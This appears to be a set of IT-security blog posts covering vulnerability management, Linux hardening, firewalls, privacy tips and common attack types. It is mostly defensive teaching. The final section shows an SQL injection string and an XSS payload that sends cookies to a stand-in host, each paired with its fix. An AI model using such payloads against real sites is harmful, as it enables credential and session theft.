After vulnerabilities are identified, they need to be evaluated so the risks posed by them are dealt with appropriately and in accordance with an organization’s risk management strategy. Vulnerability management solutions will provide different risk ratings and scores for vulnerabilities, such as Common Vulnerability Scoring System (CVSS) scores. These scores are helpful in telling organizations which vulnerabilities they should focus on first, but the true risk posed by any given vulnerability depends on some other factors beyond these out-of-the-box risk ratings and scores.

Here are some examples of additional factors to consider when evaluating vulnerabilities:

– Is this vulnerability a true or false positive?
– Could someone directly exploit this vulnerability from the Internet?
– How difficult is it to exploit this vulnerability?
– Is there known, published exploit code for this vulnerability?
– What would be the impact to the business if this vulnerability were exploited?
– Are there any other security controls in place that reduce the likelihood and/or impact of this vulnerability being exploited?
– How old is the vulnerability/how long has it been on the network?

Like any security tool, vulnerability scanners aren’t perfect. Their vulnerability detection false-positive rates, while low, are still greater than zero. Performing vulnerability validation with penetration testing tools and techniques helps weed out false-positives so organizations can focus their attention on dealing with real vulnerabilities. The results of vulnerability validation exercises or full-blown penetration tests can often be an eye-opening experience for organizations that thought they were secure enough or that the vulnerability wasn’t that risky.

Step 3: Treating Vulnerabilities

Once a vulnerability has been validated and deemed a risk, the next step is to prioritize how to treat that vulnerability with the relevant business or network stakeholders. There are different ways to treat vulnerabilities, including:

Remediation: Fully fixing or patching a vulnerability so it can’t be exploited. This is the ideal treatment option that organizations strive for.
Mitigation: Lessening the likelihood and/or impact of a vulnerability being exploited. This is sometimes necessary when a proper fix or patch isn’t yet available for an identified vulnerability. This option should ideally be used to buy time for an organization to eventually remediate a vulnerability.
Acceptance: Taking no action to fix or otherwise lessen the likelihood/impact of a vulnerability being exploited. This is typically justified when a vulnerability is deemed a low risk, and the cost of fixing the vulnerability is substantially greater than the cost incurred by an organization if the vulnerability were to be exploited.

Vulnerability management solutions provide recommended remediation techniques for vulnerabilities. Occasionally a remediation recommendation isn’t the optimal way to remediate a vulnerability; in those cases, the right remediation approach needs to be determined by an organization’s security team, system owners, and system administrators. Remediation can be as simple as applying a readily-available software patch or as complex as replacing a fleet of physical servers across an organization’s network.

When remediation activities are completed, it’s best to run another vulnerability scan to confirm that the vulnerability has been fully resolved.

However, not all vulnerabilities need to be fixed. For example, if an organization’s vulnerability scanner has identified vulnerabilities in Adobe Flash Player on their computers, but they completely disabled Adobe Flash Player from being used in web browsers and other client applications, then those vulnerabilities could be considered sufficiently mitigated by a compensating control.

Step 4: Reporting vulnerabilities

Performing regular and continuous vulnerability assessments enables organizations to understand the speed and efficiency of their vulnerability management program over time. Vulnerability management solutions typically have different options for exporting and visualizing vulnerability scan data with a variety of customizable reports and dashboards. Not only does this help IT teams easily understand which remediation techniques will help them fix the most vulnerabilities with the least amount of effort, or help security teams monitor vulnerability trends over time in different parts of their network, but it also helps support organizations’ compliance and regulatory requirements.

Staying Ahead of Attackers through Vulnerability Management

Threats and attackers are constantly changing, just as organizations are constantly adding new mobile devices, cloud services, networks, and applications to their environments. With every change comes the risk that a new hole has been opened in your network, allowing attackers to slip in and walk out with your crown jewels.

Every time you get a new affiliate partner, employee, client or customer, you open up your organization to new opportunities, but you’re also exposing it to new threats. Protecting your organization from these threats requires a vulnerability management solution that can keep up with and adapt to all of these changes. Without that, attackers will always be one step ahead.

How are vulnerabilities defined?

While security vendors can choose to build their own vulnerability definitions, vulnerability management is commonly seen as being an open, standards-based effort using the security content automation protocol (SCAP) standard developed by the National Institute of Standards and Technology (NIST). At a high level, SCAP can be broken down into a few components:

Common vulnerabilities and exposures (CVE) – Each CVE defines a specific vulnerability by which an attack may occur.
Common configuration enumeration (CCE) – A CCE is a list of system security configuration issues that can be used to develop configuration guidance.
Common platform enumeration (CPE) – CPEs are standardized methods of describing and identifying classes of applications, operating systems, and devices within your environment. CPEs are used to describe what a CVE or CCE applies to.
Common vulnerability scoring system (CVSS) – This scoring system works to assign severity scores to each defined vulnerability and is used to prioritize remediation efforts and resources according to the threat. Scores range from 0 to 10, with 10 being the most severe.


My journey with CompTIA Linux+ exam

In this blog post I will explain the steps I took to prepare for the Linux+ exam.
I am giving myself a few months to prepare before I take the exam, and hopefully I will pass the first time.

The resources I used were:

The Official CompTIA Linux+ Self-Paced Study Guide (Exam XK0-004) eBook

Books:

The Linux Command Line, 2nd Edition by William Shotts
How Linux Works, 3rd Edition by Brian Ward

ITProTV – video course and lab session
https://lab.redhat.com
https://linuxjourney.com

 


Linux server hardening

Linux server hardening is a set of measures used to reduce the attack surface and improve the security of your servers. Hardening can be done on different levels, from the physical level, by restricting the access of unauthorized people, to the application level, by removing unwanted software listening on incoming connections.

 

Use Secure Shell Protocol

Secure Shell Protocol (or SSH) enables you to make a secure connection to your network services over an unsecured network. Here are some helpful tips for implementing SSH:

-Each server should be configured to use SSH for logging in remotely. Other protocols, such as Telnet and rlogin, transfer the password in plain text, leaving a gaping hole for on-path (previously known as man-in-the-middle) attacks.
-Configure IPTables to restrict SSH access from known IPs only.
-Use SSH version 2 because of its security enhancements over SSH version 1.
-Consider disabling SSH altogether if it’s not needed.
-Key-based authentication should be used instead of password-based authentication.
-Client keys should be encrypted to prevent their use in case they are stolen.
-While configuring the server, root login should also be disabled and only users with the appropriately configured access level should be allowed to login. Users can use sudo to perform tasks requiring elevated privileges.
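
Several of these tips boil down to a few lines in /etc/ssh/sshd_config; a minimal sketch using standard OpenSSH options:

# Example /etc/ssh/sshd_config settings:
PermitRootLogin no          # block direct root logins; use sudo instead
PasswordAuthentication no   # require key-based authentication
PubkeyAuthentication yes

# Validate and apply (the service may be called ssh rather than sshd on Debian/Ubuntu):
sudo sshd -t
sudo systemctl restart sshd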

 

Close Open Ports

Tools like netstat will help you check which software is listening for incoming connections. If you find an unnecessary service or server application listening for inbound connections, disable the port or remove the application.

Vulnerabilities in such applications can be exploited by attackers, hence closing down unnecessary open ports can quickly reduce the attack surface.

To take it one step further, block the unused ports to avoid any new service binding to them.
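
For example, you might audit and close down a port like this (cups is just an illustrative service):

sudo netstat -tulpn                 # list listening TCP/UDP ports and the owning processes (or: ss -tulpn)
sudo systemctl disable --now cups   # stop and disable an unneeded listening service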

 

Enable Firewall

Using Linux iptables to keep tabs on incoming, outgoing, and forwarded packets can help you secure your servers. You can configure “allow” and “deny” rules to accept or send traffic from specific IP addresses. This restricts unchecked traffic movement on your servers.

However, just securing the perimeter via a firewall is not enough. In the cloud, VMs should be configured to run in a Zero Trust network, as opposed to on-premises VMs sitting behind a demilitarized zone, where any communication between VMs is considered relatively secure.
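
A couple of illustrative iptables rules (the source address is a placeholder from the documentation range):

sudo iptables -A INPUT -p tcp -s 203.0.113.10 --dport 22 -j ACCEPT   # allow SSH only from a known admin IP
sudo iptables -A INPUT -p tcp --dport 22 -j DROP                     # drop SSH from everywhere else
sudo iptables -L -n -v                                               # review the active rules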

 

Disable USB and Thunderbolt Devices

Allowing booting from unauthorized external devices can allow attackers to bypass the security of your system by booting the operating system from their external device.

To preempt this kind of access, lock down booting from external USBs, CDs, and disks from BIOS. As an added step, putting password protection on BIOS will make it so that boot settings can only be changed by authorized users.

While you’re at it, enabling UEFI Secure Boot will further ensure only trusted binaries are loaded during boot.

Disabling boot from external devices can only safeguard you from unauthorized access. Users who have access to the system and malicious intent can still copy sensitive files to their USB and Thunderbolt devices. Worse still, they can install malware, viruses, or backdoors on your servers. Once access to USB and Thunderbolt devices is disabled, a user cannot harm the system in these ways.

Finally, consider encrypting your full disk to avoid data loss in case of theft of machines or drives themselves.

 

Turn On SELinux

Security-Enhanced Linux, or SELinux for short, is a built-in access control mechanism. For systems connected to the internet and accessed by public users, disabling SELinux can be catastrophic for your servers.

SELinux operates in the following three modes:

Disabled: SELinux is completely off. You should avoid this mode at all times.
Permissive: In this mode SELinux doesn't enforce any policies, but logs and audits all actions. This can be used while configuring the machine and installing services to ensure everything is running, but you should switch to Enforcing as soon as configuration is done.
Enforcing: This mode is the most secure and enforces all policies. It is the default mode of SELinux and is also the recommended mode.

 

Strong Password Policies

Using easy-to-crack passwords or continuing to use passwords that have been exposed in data breaches can weaken the security of even the most sophisticated systems. Here are a few password best practices:

-Disable accounts with empty passwords and ask users to set passwords for their accounts. Also disable the root account. Use of sudo should be promoted as it provides better auditing and control.
-Encourage stronger, harder-to-guess passwords by requiring them to follow certain guidelines.
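
A quick sketch of auditing for weak accounts (the username is a placeholder):

sudo awk -F: '($2 == "") {print $1}' /etc/shadow   # find accounts with empty passwords
sudo passwd -l someuser                            # lock an offending account
sudo passwd -l root                                # lock direct root logins; use sudo instead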

 

Purge Unnecessary Packages

Operating systems often come preloaded with software and services that run constantly in the background without notice. To enhance the security of your servers, list all packages and software installed on your servers using your package managers (apt, yum, dpkg).

Security vulnerabilities in such software can lead to compromised servers, so make it a practice to uninstall unnecessary programs.
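
For example, on common distributions:

apt list --installed     # Debian/Ubuntu: list everything installed (dpkg -l also works)
yum list installed       # RHEL/CentOS equivalent
sudo apt purge telnetd   # example: remove an unneeded (and insecure) package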

 

Keep Kernel and Packages Updated

With such a large and active open-source community around Linux, security issues within the kernel and packages are fixed quickly. These fixes are available in the form of updated packages or patches in the Linux kernel.

Keep your kernel and packages updated with the latest security updates to avoid exploitation of known vulnerabilities.
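
For example:

sudo apt update && sudo apt upgrade -y   # Debian/Ubuntu: refresh package lists and apply updates
sudo yum update -y                       # RHEL/CentOS equivalent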

 

Disable ICMP

Internet Control Message Protocol (ICMP) allows internet hosts to notify other hosts about errors and helps system administrators in troubleshooting. However, ICMP can also be exploited by adversaries to gain information about attacked networks.

When ICMP is enabled, malicious attacks including network discovery, covert communication channels, and network traffic redirections can be executed. Below are a few examples of types of attacks that can be unleashed when ICMP is enabled.

Ping sweep: Attackers use this to identify all hosts on a network.
Ping flood: Attackers can send ICMP messages in rapid succession, causing exhaustion of both incoming and outgoing bandwidth.

Keep in mind that completely disabling ICMP can hamper diagnostics, reliability, and network performance. Therefore, it's best to disable only certain types of ICMP messages to secure network devices. You should still have Type 3 (Destination Unreachable) and Type 4 (Source Quench) enabled to avoid any network performance drop.
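
As a sketch, selective restrictions might look like this:

sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=1             # ignore broadcast echo requests (smurf-style floods)
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP   # or drop inbound pings entirely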

 

Logging and Auditing

Keeping detailed logging and auditing enabled for your servers is crucial. These logs can later be used to detect any attempted intrusions. Also, in case of intrusion, these logs will help you gauge the extent of the breach and offer insight for a blameless postmortem of the incident. Syslog logs all messages in the /var/log directory by default.
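
A few commands for reviewing those logs (the auth log is /var/log/secure on RHEL-based systems):

sudo tail -f /var/log/auth.log   # watch authentication events live
last                             # review recent successful logins
sudo lastb                       # review failed login attempts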


What is cloud computing?

The term describes a service in which a host (also known as a "provider") makes its IT infrastructure available to you, letting you manage your data much as you would on your own computer. The alternative, of course, is to buy, host, and maintain your own servers and data center.

Cloud computing is the on-demand delivery of IT resources over the Internet with pay-as-you-go pricing. Instead of buying, owning, and maintaining physical data centers and servers, you can access technology services, such as computing power, storage, and databases, on an as-needed basis from a cloud provider like Amazon Web Services (AWS).

What are the core elements of cloud computing?

Cloud computing can be broken down into a number of different constituent elements, focusing on different parts of the technology stack and different use cases. Let’s take a look at some of the best known in a bit more detail.

Infrastructure as a Service (IaaS) refers to the fundamental building blocks of computing that can be rented: physical or virtual servers, storage and networking. This is attractive to companies that want to build applications from the very ground up and want to control nearly all the elements themselves, but it does require firms to have the technical skills to be able to orchestrate services at that level.

Platform as a Service (PaaS) is the next layer up – as well as the underlying storage, networking, and virtual servers, this layer also includes the tools and software that developers need to build applications on top, which could include middleware, database management, operating systems, and development tools.

Software as a Service (SaaS) is the delivery of applications as a service, probably the version of cloud computing that most people are used to on a day-to-day basis. The underlying hardware and operating system is irrelevant to the end user, who will access the service via a web browser or app; it is often bought on a per-seat or per-user basis.

SaaS is the largest chunk of cloud spending simply because the variety of applications delivered via SaaS is huge, from CRM such as Salesforce, through to Microsoft’s Office 365. And while the whole market is growing at a furious rate, it’s the IaaS and PaaS segments that have consistently grown at much faster rates, according to analyst IDC: “This highlights the increasing reliance of enterprises on a cloud foundation built on cloud infrastructure, software-defined data, compute and governance solutions as a Service, and cloud-native platforms for application deployment for enterprise IT internal applications.” IDC predicts that IaaS and PaaS will continue growing at a higher rate than the overall cloud market “as resilience, flexibility, and agility guide IT platform decisions”.

While the big cloud vendors would be very happy to provide all the computing needs of their enterprise customers, businesses are increasingly looking to spread the load across a number of suppliers. All of this has led to the rise of multi-cloud. Part of this approach is to avoid being locked into just one vendor (which can lead to the sort of high costs and inflexibility that the cloud is often claimed to avoid), and part of it is to find the best mix of technologies across the industry.

That means being able to connect and integrate cloud services from multiple vendors is going to be a new and increasing challenge for businesses. Problems here include skills shortages (a lack of workers with expertise across multiple clouds) and workflow differences between cloud environments. Customers will also want to manage all their different cloud infrastructure from one place, make it easy to build applications and services and then move them, and ensure that security tools work across multiple clouds. None of this is especially easy right now.


Firewall

Stateful vs. Stateless Firewalls

Stateful firewalls monitor and track the state of all traffic on a network, filtering based on traffic patterns and flows. Stateless firewalls, by contrast, examine each packet in isolation and filter traffic against preset rules. The toy sketch below illustrates the difference.
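The packet layout and rule set here are illustrative, not any real firewall's API. The stateless check sees each packet in isolation, while the stateful check also consults a table of flows it has already admitted:

```python
# Toy sketch: stateless filtering vs. stateful connection tracking.
# A packet is (src_ip, src_port, dst_ip, dst_port); all values illustrative.
ALLOWED_DST_PORTS = {80, 443}   # static rule set
established = set()             # connection-tracking table

def stateless_allow(pkt):
    # Decision uses only the packet's own fields.
    return pkt[3] in ALLOWED_DST_PORTS

def stateful_allow(pkt):
    # Replies to tracked flows pass even without a matching static rule.
    reply_of = (pkt[2], pkt[3], pkt[0], pkt[1])
    if reply_of in established:
        return True
    if stateless_allow(pkt):
        established.add(pkt)    # remember the new flow
        return True
    return False

outbound = ("10.0.0.5", 51000, "93.184.216.34", 443)
reply    = ("93.184.216.34", 443, "10.0.0.5", 51000)
print(stateful_allow(outbound))   # True: matches a rule, flow recorded
print(stateful_allow(reply))      # True: reply to a tracked flow
print(stateless_allow(reply))     # False: port 51000 has no static rule
```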

Difference between Traditional Firewall and Next Generation Firewall

Traditional Firewall:

A traditional firewall is a network security device that provides stateful inspection of traffic entering or exiting the network, making decisions based on state, port, and protocol. Put simply, it mainly controls the flow of traffic. It also typically offers Virtual Private Network (VPN) capabilities. Nowadays, however, traditional firewalls are not effective enough to protect against the advanced and varied cyber threats organizations face.

Next Generation Firewall:

A Next Generation Firewall is a network security device that provides the same stateful inspection of network traffic, based on state, port, and protocol, but includes far more features than a traditional firewall. It is commonly abbreviated to NGFW.

The additional features included in a Next Generation Firewall are as follows:

  • Application awareness and control
  • Integrated Intrusion Prevention System (IPS)
  • Deep Packet Inspection (DPI)
  • Cloud-delivered threat intelligence
  • Secure Sockets Layer (SSL) inspection and Secure Shell (SSH) control
  • Sandbox integration
  • Consistent performance regardless of which protections are enabled
  • Advanced threat protection
  • Web filtering
  • Antivirus, antispam, and antimalware

 

Difference between Traditional Firewall and Next Generation Firewall:

01. A traditional firewall mainly provides stateful inspection of incoming and outgoing network traffic at the network boundary; a Next Generation Firewall provides the same stateful inspection along with many additional features.
02. A traditional firewall is the older firewall security system; a Next Generation Firewall is the more advanced system.
03. A traditional firewall provides only partial application visibility and control; an NGFW provides full application visibility and control.
04. A traditional firewall works at Layer 2 to Layer 4; an NGFW works at Layer 2 to Layer 7.
05. A traditional firewall does not support application-level awareness; an NGFW does.
06. Reputation and identity services are not supported by a traditional firewall; an NGFW supports them.
07. With a traditional firewall, managing separate security tools is expensive; an NGFW's integrated security tools are easy to install and configure, reducing administrative cost.
08. A traditional firewall does not provide a complete package of security technologies; an NGFW does.
09. A traditional firewall cannot decrypt and inspect SSL traffic; an NGFW can decrypt and inspect SSL traffic in both directions.
10. A traditional firewall supports Network Address Translation (NAT), Port Address Translation (PAT), and Virtual Private Networks (VPN); an NGFW extends that functionality and integrates newer threat-management technology such as sandboxing.
11. With a traditional firewall, Intrusion Prevention Systems (IPS) and Intrusion Detection Systems (IDS) are deployed separately; in an NGFW they are fully integrated.

 


How to protect your privacy online

Limit the personal information you share on social media

A smart way to help protect your privacy online? Don’t overshare on social media. Providing too much information on Facebook, Twitter, and Instagram could make it easier for cybercriminals to obtain identifying information, which could allow them to steal your identity or to access your financial information.

For example, could an identity thief determine your high school mascot or your mother’s maiden name from digging through your Facebook account? This information is sometimes used as security questions to change passwords on financial accounts.

To protect your online privacy, ignore the "About Me" fields in your social media profiles. You don't have to let people know when or where you were born; those details could make you an easier target for identity theft.

Explore different privacy settings, too. You might want to limit the people who can view your posts to those you’ve personally invited.

Create strong passwords, too, for your social media profiles to help prevent others from logging into them in your name. This means using at least 12 characters, mixing numbers, special characters, and upper- and lower-case letters.

Browse in private mode

If you don’t want your computer to save your browsing history, temporary internet files, or cookies, do your web surfing in private mode.

Web browsers offer their own versions of this form of privacy protection. In Chrome, it’s called Incognito Mode. Firefox calls its setting Private Browsing, and Internet Explorer uses the name InPrivate Browsing for its privacy feature. When you search with these modes turned on, others won’t be able to trace your browsing history from your computer.

But these private modes aren’t completely private. When you’re searching in incognito or private mode, your Internet Service Provider (ISP) can still see your browsing activity. If you are searching on a company computer, so can your employer. The websites you visit can also track you.

So, yes, incognito browsing does have certain benefits. But it’s far from the only tool available to help you maintain your privacy while online.

Use a different search engine

If you’re like many web surfers, you rely heavily on Google as your search engine. But you don’t have to. Privacy is one reason people prefer to use anonymous search engines.

This type of search engine doesn’t collect or share your search history or clicks. Anonymous search engines can also block ad trackers on the websites you visit.

Use a virtual private network

A virtual private network (VPN) gives you online privacy and anonymity by creating a private network from a public internet connection. VPNs mask your Internet Protocol (IP) address so your online actions are virtually untraceable.

Using a VPN is especially important when you’re on public Wi-Fi at a library, coffee shop, or other public location. A VPN will make it more difficult for cybercriminals to breach your online privacy and access your personal information.

Be careful where you click

One of the ways in which hackers compromise your online privacy is through phishing attempts. In phishing, scammers try to trick you into providing valuable financial or personal information. They’ll often do this by sending fake emails that appear to be from banks, credit card providers, or other financial institutions. Often, these emails will say that you must click on a link and verify your financial information to keep your account from being frozen or closed.

Don’t fall for these scams. If you click on a phishing link, you could be taken to a spoofed webpage that looks like the homepage of a bank or financial institution. But when you enter your account information, you’ll be sending it to the scammers behind the phishing attempt.

Before clicking on suspicious links, hover your cursor over the link to view the destination URL. If it doesn’t match the financial website you use, don’t click.
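That comparison can also be automated. A minimal Python sketch using only the standard library; the expected host and example URLs are made up for illustration:

```python
# Minimal sketch of the "check the destination before clicking" rule:
# compare a link's real hostname against the site you expect.
from urllib.parse import urlparse

def looks_suspicious(href: str, expected_host: str) -> bool:
    host = urlparse(href).hostname or ""
    return not (host == expected_host or host.endswith("." + expected_host))

print(looks_suspicious("https://www.example-bank.com/login",
                       "example-bank.com"))               # False
print(looks_suspicious("https://example-bank.com.evil.test/login",
                       "example-bank.com"))               # True
```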

Secure your mobile devices

Many of us spend more time surfing the web, answering emails, and watching videos on our smartphones than we do on our laptops. It’s important, then, to put as much effort into protecting our online privacy on our phones and tablets as on our computers.

To start, make sure to use a passcode to lock your phone. It might seem like a hassle to enter a code every time you want to access your phone’s home screen. But this passcode could offer an extra layer of protection if your phone is lost or stolen. Make sure your passcode is complex. Don’t use your birthdate, your house number, or any other code that thieves might be able to guess.

Use caution when downloading apps. These games and productivity tools could come embedded with dangerous viruses. Only download apps from legitimate sources.

Use the same caution, too, when searching the web or reading emails on your mobile devices as you do when using your laptop or desktop computer.

Don’t ignore software updates, either. These updates often include important protections against the latest viruses.

Use quality antivirus software

Finally, always install antivirus software on all your devices. This software can keep hackers from remotely taking over your computer, accessing your personal and financial information, and tracking your location.

Manufacturers frequently update their virus protection software as a defense against the latest malware, spyware, and other viruses. Install updates as soon as they become available or set up automatic updates on all your devices.


What is cyber security?

Cyber security is how individuals and organisations reduce the risk of cyber attack.
Cyber security’s core function is to protect the devices we all use (smartphones, laptops, tablets and computers), and the services we access – both online and at work – from theft or damage. It’s also about preventing unauthorised access to the vast amounts of personal information we store on these devices, and online.

Common Types of Cyber Security Attacks

Malware
The term “malware” encompasses various types of attacks, including spyware, viruses, and worms. Malware uses a vulnerability to breach a network, typically when a user clicks a “planted” dangerous link or email attachment that then installs malicious software inside the system.

Malware and malicious files inside a computer system can:
– Deny access to the critical components of the network
– Obtain information by retrieving data from the hard drive
– Disrupt the system or even render it inoperable

Malware is so common that it comes in a large variety of forms. The most common types are:

Viruses – these infect applications, attaching themselves to the initialization sequence. The virus replicates itself, infecting other code in the computer system. A virus can also attach itself to executable code or associate itself with a file by creating a virus file with the same name but an .exe extension, creating a decoy that carries the virus.
Trojans – programs that hide inside a useful program with malicious intent. Unlike viruses, a trojan doesn’t replicate itself; it is commonly used to establish a backdoor to be exploited by attackers.
Worms – unlike viruses, worms don’t attack a host; they are self-contained programs that propagate across networks and computers. Worms are often installed through email attachments, sending a copy of themselves to every contact in the infected computer’s email list. They are commonly used to overload an email server and achieve a denial-of-service attack.
Ransomware – a type of malware that denies access to the victim’s data and threatens to publish or delete it unless a ransom is paid. Advanced ransomware uses cryptoviral extortion, encrypting the victim’s data so that it is impossible to recover without the decryption key.
Spyware – a type of program installed to collect information about users, their systems, or their browsing habits, sending the data to a remote user. The attacker can then use the information for blackmail or to download and install other malicious programs from the web.

Phishing
Phishing attacks are extremely common and involve sending large volumes of fraudulent emails to unsuspecting users, disguised as coming from a reliable source. The fraudulent emails often appear legitimate, but link the recipient to a malicious file or script designed to grant attackers access to your device in order to control it, gather reconnaissance, install malicious scripts or files, or extract data such as user information, financial info, and more.

Phishing attacks can also take place via social networks and other online communities, via direct messages from other users with a hidden intent. Phishers often leverage social engineering and other public information sources to collect info about your work, interests, and activities, giving attackers an edge in convincing you that they are someone they’re not.

There are several different types of phishing attacks, including:
Spear Phishing – targeted attacks directed at specific companies and/or individuals.
Whaling – attacks targeting senior executives and stakeholders within an organization.
Pharming – leverages DNS cache poisoning to capture user credentials through a fake login landing page.

Phishing attacks can also take place via phone call (voice phishing, or vishing) and via text message (SMS phishing, or smishing).

Man-in-the-Middle (MitM) Attacks
A MitM attack occurs when an attacker intercepts a two-party transaction, inserting themselves in the middle. From there, the attacker can steal and manipulate data by interrupting traffic.

This type of attack usually exploits security vulnerabilities in a network, such as unsecured public WiFi, to insert the attacker between a visitor’s device and the network. Such attacks are very difficult to detect, because the victim thinks the information is going to a legitimate destination. Phishing or malware attacks are often leveraged to carry out a MitM attack.

Denial-of-Service (DOS) Attack
DoS attacks work by flooding systems, servers, and/or networks with traffic to overload resources and bandwidth, leaving the system unable to process and fulfill legitimate requests. In addition to denial-of-service (DoS) attacks, there are also distributed denial-of-service (DDoS) attacks.

DoS attacks saturate a system’s resources with the goal of impeding response to service requests. On the other hand, a DDoS attack is launched from several infected host machines with the goal of achieving service denial and taking a system offline, thus paving the way for another attack to enter the network/environment.

The most common types of DoS and DDoS attacks are the TCP SYN flood attack, teardrop attack, smurf attack, ping-of-death attack, and botnets.

SQL Injections
SQL injection occurs when an attacker inserts malicious code into a server that uses Structured Query Language (SQL), forcing the server to reveal protected information. This type of attack usually involves submitting malicious code into an unprotected website comment or search box. Secure coding practices, such as using prepared statements with parameterized queries, are an effective way to prevent SQL injections.

When a SQL command uses a parameter instead of inserting the values directly into the query text, the SQL interpreter treats the parameter purely as data and never executes it as code, so the backend is prevented from running malicious queries.
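A minimal, self-contained Python sketch of the difference using the built-in sqlite3 module; the table, values, and payload are illustrative:

```python
# Minimal sketch: string-built SQL vs. a parameterized query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "alice' OR '1'='1"   # classic injection payload

# Vulnerable: the payload is spliced into the SQL text itself.
vulnerable = f"SELECT secret FROM users WHERE name = '{user_input}'"
print(conn.execute(vulnerable).fetchall())        # leaks every row

# Safe: the driver passes the payload purely as data, never as SQL.
print(conn.execute("SELECT secret FROM users WHERE name = ?",
                   (user_input,)).fetchall())     # []
```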

Zero-day Exploit
A zero-day exploit targets a network vulnerability that is newly announced, before a patch is released or implemented. Zero-day attackers jump on the disclosed vulnerability in the small window of time during which no solution or preventative measure exists. Preventing zero-day attacks therefore requires constant monitoring, proactive detection, and agile threat management practices.

Password Attack
Passwords are the most widespread method of authenticating access to a secure information system, making them an attractive target for cyber attackers. By accessing a person’s password, an attacker can gain entry to confidential or critical data and systems, including the ability to manipulate and control said data/systems.

Password attackers use a myriad of methods to identify an individual password, including social engineering, gaining access to a password database, sniffing the network connection to obtain unencrypted passwords, or simply guessing.

The last method mentioned is executed in a systematic manner known as a “brute-force attack.” A brute-force attack employs a program to try all the possible variants and combinations of information to guess the password.

Another common method is the dictionary attack, in which the attacker uses a list of common passwords to attempt to gain access to a user’s computer and network. Account lockout best practices and two-factor authentication are very useful at preventing a password attack: lockout features freeze the account after a number of invalid password attempts, while two-factor authentication adds an additional layer of security, requiring the user logging in to enter a secondary code only available on their 2FA device(s). A toy version of the lockout idea is sketched below.
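In this Python sketch, check_credentials is a hypothetical stand-in for a real authentication backend, and the five-attempt threshold is an assumption:

```python
# Minimal sketch: freeze an account after repeated invalid attempts.
MAX_ATTEMPTS = 5
failed_attempts = {}

def check_credentials(user, password):
    # Hypothetical stand-in for a real authentication backend.
    return password == "correct horse battery staple"

def login(user, password):
    if failed_attempts.get(user, 0) >= MAX_ATTEMPTS:
        return "account locked"
    if check_credentials(user, password):
        failed_attempts.pop(user, None)   # reset counter on success
        return "ok"
    failed_attempts[user] = failed_attempts.get(user, 0) + 1
    return "invalid credentials"

for guess in ["aaa", "bbb", "ccc", "ddd", "eee", "fff"]:
    print(login("alice", guess))          # locks after the fifth failure
```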

Cross-site Scripting
A cross-site scripting (XSS) attack injects malicious scripts into content served from otherwise trusted websites. The malicious code joins the dynamic content sent to the victim’s browser. Usually this code is JavaScript executed by the victim’s browser, but it can also include HTML, Flash, or other active content.
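The standard defense is to escape untrusted input before it joins that dynamic content. A minimal Python sketch using the built-in html module; the payload is illustrative:

```python
# Minimal sketch: escape untrusted input so the browser renders it as
# inert text instead of executing it as script.
import html

user_comment = '<script>fetch("https://evil.test/?c=" + document.cookie)</script>'
print(html.escape(user_comment))
# &lt;script&gt;fetch(&quot;https://evil.test/?c=&quot; + document.cookie)&lt;/script&gt;
```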